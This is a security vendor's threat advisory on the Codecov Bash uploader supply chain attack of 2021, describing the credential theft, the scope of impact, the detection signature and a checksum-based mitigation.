Threat Signal ReportCodecov Supply Chain Attack Affecting Organizations Worldwide
Description
FortiGuard Labs is aware of reports of a supply chain attack on Codecov, a software auditing company. Codecov is a code analysis tool that helps developers audit their code within an organization. The attack occurred when an unnamed threat actor was able to access and modify the Codecov bash uploader script. According to Codecov, the attacker was able to leverage a vulnerability in Codecov's Docker image creation process that allowed the attacker to steal the credential, which then allowed the attacker to modify the script.
According to Codecov, the first observed activity started around January 31, 2021 when sporadic instances of the modified Bash uploader script were seen exfiltrating data that was stored in Codecov's continuous integration environments. The exfiltrated data was then sent to a remote server controlled by the attacker.
How Widespread is this Attack?
Global. According to various sources, as many as 29,000 organizations worldwide are impacted because they have or use products that use the Codecov product.
What is the Scope of Impact of this Issue?
According to Codecov:
Any credentials, tokens, or keys that our customers were passing through their CI runner that would be accessible when the Bash Uploader script was executed. Any services, datastores, and application code that could be accessed with these credentials, tokens, or keys. The git remote information (URL of the origin repository) of repositories using the Bash Uploaders to upload coverage to Codecov in CI.
How Serious of an Issue is This?
HIGH.
Is there Any Identified Nation State Activity or Attribution?
No. There has been no known reports of identified threat actors behind this supply chain attack.
What is the status of Protections?
FortiGuard Labs has the following (AV) signatures in place for publicly available samples as:
BASH/Agent.AK!tr
All network IOC's are blocked by the Web Filtering client.
Any Other Suggested Mitigation?
It is suggested that any and all file downloads from a trusted source be double checked against a checksum list where one can cross reference the vendor provided checksum. If the hash does not equal what is published by the vendor, it is suggested to either download the file again or terminate and notify the vendor of the discrepancy. For further details and vendor specific suggestions, please refer to the Bash Uploader Security Update in the APPENDIX.
